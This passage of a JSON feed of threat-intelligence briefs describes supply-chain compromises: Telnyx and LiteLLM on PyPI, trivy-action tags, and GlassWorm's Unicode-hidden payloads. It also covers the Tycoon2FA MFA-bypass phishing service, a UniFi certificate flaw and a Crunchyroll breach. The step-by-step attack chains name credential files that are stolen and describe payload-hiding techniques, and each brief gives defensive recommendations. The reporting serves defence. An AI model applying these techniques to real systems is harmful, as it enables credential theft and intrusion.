\u003ccode\u003etelnyx/_client.py\u003c/code\u003e file and executes upon import. The compromise is believed to have originated from stolen credentials for the publishing account on the PyPI registry. 
TeamPCP has been linked to previous supply-chain attacks and wiper campaigns against Iranian systems, highlighting the group\u0026rsquo;s focus on disrupting software development and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the Telnyx PyPI account, likely through credential theft.\u003c/li\u003e\n\u003cli\u003eMalicious versions 4.87.1 and 4.87.2 of the Telnyx package are published to PyPI.\u003c/li\u003e\n\u003cli\u003eWhen a developer installs the compromised Telnyx package, the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file is executed upon import.\u003c/li\u003e\n\u003cli\u003eOn Linux and macOS, a detached process is spawned to download a second-stage payload disguised as a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eSteganography is used to hide malicious code within the WAV file\u0026rsquo;s data frames.\u003c/li\u003e\n\u003cli\u003eThe embedded payload is extracted using an XOR-based decryption routine and executed in memory.\u003c/li\u003e\n\u003cli\u003eThe malware harvests sensitive data, including SSH keys, credentials, cloud tokens, cryptocurrency wallets, and environment variables.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes is present, the malware enumerates cluster secrets and deploys privileged pods to access underlying host systems. On Windows, a different WAV file (\u003ccode\u003ehangup.wav\u003c/code\u003e) is downloaded that extracts and saves an executable named \u003ccode\u003emsbuild.exe\u003c/code\u003e to the startup folder for persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could result in widespread compromise of systems utilizing the Telnyx Python SDK. Over 740,000 monthly downloads indicate a large potential victim pool. 
Stolen credentials and secrets can lead to unauthorized access to cloud resources, sensitive data exfiltration, and further lateral movement within compromised networks. For systems running Kubernetes, the attacker could gain control over the entire cluster, leading to significant disruption and data loss. Developers who installed the malicious packages are advised to consider their systems fully compromised and rotate all secrets as soon as possible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify and remove Telnyx versions 4.87.1 and 4.87.2 from all environments, reverting to version 4.87.0 as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for processes spawned by Python interpreters (\u003ccode\u003epython.exe\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e) attempting to download files with the \u003ccode\u003e.wav\u003c/code\u003e extension, using the \u0026ldquo;Detect Suspicious Python WAV Download\u0026rdquo; Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls and multi-factor authentication for PyPI accounts used to publish packages to prevent similar supply chain attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect msbuild.exe in Startup Folder\u0026rdquo; Sigma rule to identify potential persistence attempts on Windows systems.\u003c/li\u003e\n\u003cli\u003eRotate all secrets and credentials on any system that has imported the malicious Telnyx package.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-teampcp-telnyx/","summary":"The TeamPCP threat actor compromised the Telnyx PyPI package, injecting credential-stealing malware hidden within WAV audio files to target Linux, macOS, and Windows systems.","title":"TeamPCP Backdoors Telnyx PyPI Package with Steganographic 
Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","MFA-bypass"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eTycoon2FA is a subscription-based PhaaS platform that enables cybercriminals to bypass multifactor authentication (MFA) and compromise email accounts using adversary-in-the-middle (AITM) techniques. The platform gained prominence in 2025, reportedly generating over 30 million malicious emails in a single month and accounting for 62% of all phishing attempts blocked by Microsoft at one point. On March 4, 2026, Europol announced a technical disruption of Tycoon2FA, seizing 330 domains forming the platform’s core infrastructure. Despite this takedown, CrowdStrike Falcon Complete observed a short-term decrease in Tycoon2FA activity followed by a return to pre-disruption levels. The persistence of the platform\u0026rsquo;s original tactics, techniques, and procedures (TTPs) suggests that the actors behind Tycoon2FA remain active and pose a continued threat. 
Defenders should maintain vigilance.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails designed to appear legitimate.\u003c/li\u003e\n\u003cli\u003eThese emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, a JavaScript (JS) file extracts the victim\u0026rsquo;s email address.\u003c/li\u003e\n\u003cli\u003eThe victim is then redirected to a fake Microsoft 365 or Google login page hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials, which are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the victim\u0026rsquo;s session cookies and credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the victim\u0026rsquo;s cloud environment using the stolen cookies and credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to the victim\u0026rsquo;s email and other cloud-based resources, potentially leading to data exfiltration or further malicious activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eTycoon2FA\u0026rsquo;s operations began in 2023, and by mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. A successful attack can lead to unauthorized access to sensitive data, business email compromise, financial loss, and reputational damage. 
The resurgence of Tycoon2FA following the takedown indicates the platform remains a significant threat, highlighting the need for robust defenses against phishing and credential theft.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor email traffic for unusual patterns and sender addresses to detect phishing attempts associated with Tycoon2FA (IOC: phishing emails).\u003c/li\u003e\n\u003cli\u003eImplement and tune web filtering rules to block access to known Tycoon2FA domains and newly registered domains that may be used for phishing campaigns (IOC: Tycoon2FA domain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect JavaScript files that attempt to extract email addresses from web pages, a technique used by Tycoon2FA to target victims.\u003c/li\u003e\n\u003cli\u003eReview and reinforce MFA policies and educate users about the risks of phishing and credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:28:28Z","date_published":"2026-03-28T08:28:28Z","id":"/briefs/2026-03-tycoon2fa-resurgence/","summary":"The Tycoon2FA phishing-as-a-service (PhaaS) platform, disrupted in March 2026, has resurged with consistent tactics, employing adversary-in-the-middle (AITM) techniques to bypass MFA and compromise email accounts through phishing campaigns, credential theft, and session cookie hijacking.","title":"Tycoon2FA PhaaS Platform Resurgence After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-resurgence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","MFA-bypass","phishing-as-a-service"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 4, 2026, Europol announced a technical disruption of the Tycoon2FA Phishing-as-a-Service (PhaaS) platform, which enabled cybercriminals to bypass multifactor authentication (MFA) and 
compromise email accounts. The takedown involved seizing 330 domains that formed the platform’s core infrastructure. However, following the takedown, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and the platform continues to employ previously observed TTPs. Tycoon2FA, active since 2023, was responsible for a significant portion of phishing attempts, purportedly generating over 30 million malicious emails in a single month in mid-2025. The platform primarily targets Microsoft 365 and Google accounts using adversary-in-the-middle (AITM) techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails directing them to Tycoon2FA CAPTCHA pages.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, victims\u0026rsquo; session cookies are stolen.\u003c/li\u003e\n\u003cli\u003eA JavaScript (JS) file is used to extract victims’ email addresses.\u003c/li\u003e\n\u003cli\u003eVictims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials into the fake login pages, which are then proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eThe threat actor authenticates to the victim’s cloud environment using the stolen cookies and credentials.\u003c/li\u003e\n\u003cli\u003eOnce authenticated, the attacker gains access to the victim\u0026rsquo;s email and other cloud resources.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as data exfiltration, sending phishing emails to other targets, or further compromising the organization\u0026rsquo;s environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe resurgence of Tycoon2FA demonstrates the resilience of PhaaS 
platforms and their operators. The platform was responsible for a large percentage of phishing attacks in 2025, including 62% of all phishing attempts blocked by Microsoft in mid-2025, and generating over 30 million malicious emails in a single month. Successful attacks can lead to unauthorized access to sensitive data, financial losses, and reputational damage. The observed return to pre-disruption activity levels indicates a sustained threat to organizations relying on MFA for account security.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Tycoon2FA Phishing Redirection\u0026rdquo; Sigma rule to detect potential phishing attempts redirecting to Tycoon2FA infrastructure.\u003c/li\u003e\n\u003cli\u003eMonitor email traffic for patterns indicative of phishing campaigns, focusing on emails directing users to external login pages, as described in the Attack Chain.\u003c/li\u003e\n\u003cli\u003eImplement strict session management policies and regularly review user authentication logs for suspicious activity following successful authentication as described in the attack chain, step 7.\u003c/li\u003e\n\u003cli\u003eBlock known Tycoon2FA domains at the DNS resolver, as referenced in the IOC section.\u003c/li\u003e\n\u003cli\u003eEducate users about the tactics used by Tycoon2FA, specifically the use of CAPTCHA pages to steal session cookies, as described in the Attack Chain, step 2.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:20:54Z","date_published":"2026-03-28T08:20:54Z","id":"/briefs/2026-04-tycoon2fa-resurgence/","summary":"The Tycoon2FA Phishing-as-a-Service platform, used to bypass multifactor authentication (MFA), has resurged to pre-takedown levels of activity following a disruption effort in March 2026, maintaining its original tactics, techniques, and procedures (TTPs) for credential harvesting and cloud compromise.","title":"Tycoon2FA 
Phishing-as-a-Service Resurgence After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-04-tycoon2fa-resurgence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. 
This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer triggers a GitHub Actions workflow that utilizes the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner downloads the specified version of the \u003ccode\u003etrivy-action\u003c/code\u003e from GitHub.\u003c/li\u003e\n\u003cli\u003eDue to tag repointing, the downloaded action contains malicious code in the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script executes a multi-stage credential theft operation.\u003c/li\u003e\n\u003cli\u003eThe script enumerates process IDs (PIDs) to discover runner processes.\u003c/li\u003e\n\u003cli\u003eAfter credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.\u003c/li\u003e\n\u003cli\u003eStolen credentials and secrets are likely exfiltrated to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. 
The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipelines for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action and verify the integrity of the action being used.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runners.\u003c/li\u003e\n\u003cli\u003eMonitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).\u003c/li\u003e\n\u003cli\u003eEnable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.\u003c/li\u003e\n\u003cli\u003eImplement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:12:22Z","date_published":"2026-03-28T08:12:22Z","id":"/briefs/2026-03-trivy-action-compromise/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.","title":"Compromised trivy-action GitHub Action Enables Credential 
Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["unifi","mitm","credential-theft","cve-2019-25652"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2019-25652 affects UniFi Network Controller versions prior to 5.10.22 and 5.11.x before 5.11.18. The vulnerability stems from an improper certificate verification process during SMTP connections. An attacker positioned on an adjacent network can exploit this weakness to conduct man-in-the-middle (MitM) attacks. By presenting a false SSL certificate, the attacker can intercept SMTP traffic intended for the UniFi Network Controller, potentially gaining access to sensitive information…\u003c/p\u003e\n","date_modified":"2026-03-27T22:16:19Z","date_published":"2026-03-27T22:16:19Z","id":"/briefs/2026-03-unifi-cert-bypass/","summary":"UniFi Network Controller versions before 5.10.22 and 5.11.x before 5.11.18 contain an improper certificate verification vulnerability, enabling adjacent network attackers to perform man-in-the-middle attacks by presenting a fraudulent SSL certificate during SMTP connections to intercept traffic and steal credentials.","title":"UniFi Network Controller Improper Certificate Verification Vulnerability (CVE-2019-25652)","url":"https://feed.craftedsignal.io/briefs/2026-03-unifi-cert-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 25, 2026, two malicious versions of the \u003ccode\u003elitellm\u003c/code\u003e package (versions 1.82.7 and 1.82.8) were discovered on the PyPI repository. These versions were found to contain automatically activated malware. 
The malicious code was designed to harvest sensitive credentials and files from systems where the compromised packages were installed. This supply chain attack follows a previous API token exposure stemming from a compromised trivy dependency, indicating a potential escalation in targeting the \u003ccode\u003elitellm\u003c/code\u003e project. The compromised packages exfiltrate stolen data to a remote API controlled by the attacker.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises the \u003ccode\u003elitellm\u003c/code\u003e PyPI package repository, likely leveraging exposed credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into versions 1.82.7 and 1.82.8 of the \u003ccode\u003elitellm\u003c/code\u003e package. The malicious code is automatically activated upon installation.\u003c/li\u003e\n\u003cli\u003eA user installs either \u003ccode\u003elitellm\u003c/code\u003e version 1.82.7 or 1.82.8 via \u003ccode\u003epip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eUpon execution, the malicious code begins harvesting credentials and files accessible to the \u003ccode\u003elitellm\u003c/code\u003e environment. This may include API keys, tokens, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a network connection to a remote API server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe harvested credentials and files are exfiltrated to the attacker\u0026rsquo;s remote API server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to services and data protected by the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacts any user who installed the malicious \u003ccode\u003elitellm\u003c/code\u003e packages (versions 1.82.7 and 1.82.8). 
Successful credential harvesting allows attackers to pivot and compromise other systems and services accessible with the stolen credentials, potentially leading to data breaches, unauthorized access, and further lateral movement within victim environments. The number of affected users is currently unknown, but the popularity of \u003ccode\u003elitellm\u003c/code\u003e suggests a potentially wide impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately revoke and rotate any credentials accessible to environments where \u003ccode\u003elitellm\u003c/code\u003e versions 1.82.7 or 1.82.8 were installed (description).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect installations of the affected \u003ccode\u003elitellm\u003c/code\u003e versions (Sigma rule).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from \u003ccode\u003elitellm\u003c/code\u003e processes to external, untrusted APIs (network_connection).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency management practices, including the use of software composition analysis tools, to identify and prevent the installation of malicious packages (overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-litellm-supply-chain/","summary":"Compromised versions of the LiteLLM package (1.82.7 and 1.82.8) on PyPI contained malware designed to harvest sensitive credentials and files, exfiltrating them to a remote API, impacting users who installed and ran the package.","title":"Malicious LiteLLM Versions Harvest 
Credentials","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","llm","trivy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 24, 2026, reports surfaced indicating that the LiteLLM package, a library designed to provide a unified interface for interacting with various large language models, was compromised and injected with malicious code. This compromise occurred through a vulnerability in Trivy, a widely-used open-source vulnerability scanner. The malicious code was designed to steal credentials, potentially including API keys and other sensitive information used to access and manage language models. The scope of the compromise is currently unknown, but given the popularity of both LiteLLM and Trivy, the potential impact could be significant across various sectors using LLMs. This incident highlights the risks associated with supply chain vulnerabilities and the importance of thorough security audits of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA vulnerability is exploited within Trivy, potentially during its build or update process.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages this vulnerability to inject malicious code into the LiteLLM package during its build or release process.\u003c/li\u003e\n\u003cli\u003eUsers download and install the compromised LiteLLM package from the official repository (e.g., PyPI).\u003c/li\u003e\n\u003cli\u003eUpon execution of the infected LiteLLM package, the malicious code is triggered.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects credentials, such as API keys, environment variables, or configuration files, from the user\u0026rsquo;s system or environment.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are 
exfiltrated to a remote server controlled by the attacker using network protocols like HTTP/S.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access and control the victim\u0026rsquo;s accounts, resources, and data related to language model services.\u003c/li\u003e\n\u003cli\u003eThe attacker may further exploit the compromised systems for lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful compromise of the LiteLLM package can lead to significant damage, including unauthorized access to language model APIs, data breaches, and financial losses. The number of affected users and organizations is currently unknown. Sectors relying heavily on LLMs, such as AI development, research, and various industries integrating AI-powered applications, are particularly vulnerable. If successful, the attack can result in the exposure of sensitive data, disruption of services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement integrity checks on all downloaded packages to verify their authenticity and prevent the installation of compromised versions (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious outbound connections originating from processes associated with the LiteLLM package, looking for connections to unknown or malicious IPs (reference: Attack Chain, step 6).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential credential theft and exfiltration attempts (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and least privilege principles to limit the impact of compromised credentials (reference: Impact).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party dependencies and use software composition 
analysis tools to identify and remediate vulnerabilities (reference: Overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-litellm-credential-theft/","summary":"The LiteLLM package was compromised and infected with credential-stealing code through a supply chain attack leveraging the Trivy vulnerability scanner.","title":"LiteLLM Package Compromised with Credential-Stealing Code via Trivy","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-credential-theft/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","unicode-encoding"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe GlassWorm campaign, active since October 2025, targets software supply chains through malicious code concealed using Unicode variation selectors. This technique renders the payload virtually invisible in standard editors and code review processes. The attackers rotate extension IDs, npm package names, wallet addresses, and C2 infrastructure across multiple waves. A decoder component extracts the hidden bytes and executes them via \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e. The malware queries a Solana wallet to dynamically retrieve C2 URLs and proceeds to steal sensitive information, including \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, SSH keys (\u003ccode\u003eid_rsa\u003c/code\u003e, \u003ccode\u003eid_ed25519\u003c/code\u003e), and token environment variables such as \u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, and \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e. Wave 5, observed in March, compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages. 
Defenders relying solely on IOC-based detections may struggle to keep pace with the rapid evolution of this threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eMalicious code is injected into a software supply chain component (VS Code extension, npm package, etc.).\u003c/li\u003e\n\u003cli\u003eThe payload is encoded using Unicode variation selectors, rendering it nearly invisible.\u003c/li\u003e\n\u003cli\u003eThe victim installs or incorporates the compromised component into their development environment.\u003c/li\u003e\n\u003cli\u003eA decoder routine within the payload utilizes \u003ccode\u003ecodePointAt()\u003c/code\u003e with arithmetic against \u003ccode\u003e0xFE00/0xE0100\u003c/code\u003e to reconstruct the original bytecode.\u003c/li\u003e\n\u003cli\u003eThe decoded bytecode is executed using \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed code queries a Solana wallet using RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e) to retrieve C2 URLs.\u003c/li\u003e\n\u003cli\u003eThe malware targets files such as \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, \u003ccode\u003eid_rsa\u003c/code\u003e, and \u003ccode\u003eid_ed25519\u003c/code\u003e for credential theft.\u003c/li\u003e\n\u003cli\u003eStolen credentials and token environment variables (\u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e) are exfiltrated to the C2 server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe GlassWorm campaign has successfully compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages in Wave 5 alone. 
Successful attacks can lead to the theft of sensitive credentials, potentially granting attackers unauthorized access to code repositories, package management accounts, and other critical infrastructure. This, in turn, can enable further supply chain attacks or intellectual property theft.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the Unicode payload detection rule to identify suspicious densities of Unicode variation selector clusters in source code (see \u0026ldquo;Unicode Payload Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eDeploy the decoder detection rule to flag code patterns that use \u003ccode\u003ecodePointAt()\u003c/code\u003e with specific arithmetic operations followed by \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e calls (see \u0026ldquo;GlassWorm Decoder Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for network connections originating from non-blockchain applications using Solana RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e), as described in the overview, to identify potential C2 activity.\u003c/li\u003e\n\u003cli\u003eImplement access controls and monitoring for sensitive files like \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, and SSH keys as described in the overview.\u003c/li\u003e\n\u003cli\u003eUse the \u003ccode\u003eglassworm-hunter\u003c/code\u003e tool linked in the references section to scan VS Code extensions, node_modules, pip site-packages, and git repos.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T14:30:00Z","date_published":"2026-03-24T14:30:00Z","id":"/briefs/2026-03-glassworm-supply-chain/","summary":"The GlassWorm campaign employs Unicode variation selectors to conceal malicious code within supply chain artifacts, subsequently 
querying a Solana wallet for C2 URLs and exfiltrating sensitive credentials.","title":"GlassWorm Supply Chain Attack Using Unicode Encoding and Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-glassworm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","data-breach","credential-theft","phishing"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, a data breach was reported at Crunchyroll, stemming from a compromise of their outsourcing partner, Telus, in India. The attackers successfully gained access to Crunchyroll\u0026rsquo;s environment after a Telus employee was targeted with a spoofed phishing email. This email delivered malware that stole the employee\u0026rsquo;s Okta credentials, granting the attacker a foothold into Crunchyroll\u0026rsquo;s systems. The breach resulted in the exfiltration of approximately 100 GB of sensitive customer analytics and ticketing data. The threat actor had unauthorized access for a duration of 24 hours before the compromised credentials were revoked. This incident highlights the risks associated with supply chain vulnerabilities and the importance of robust security measures across all partner organizations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e A Telus employee received a spoofed phishing email containing malware. (T1566)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalware Deployment:\u003c/strong\u003e The employee interacted with the phishing email, leading to the deployment of an infostealer on their machine.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The malware captured the employee\u0026rsquo;s Okta credentials. 
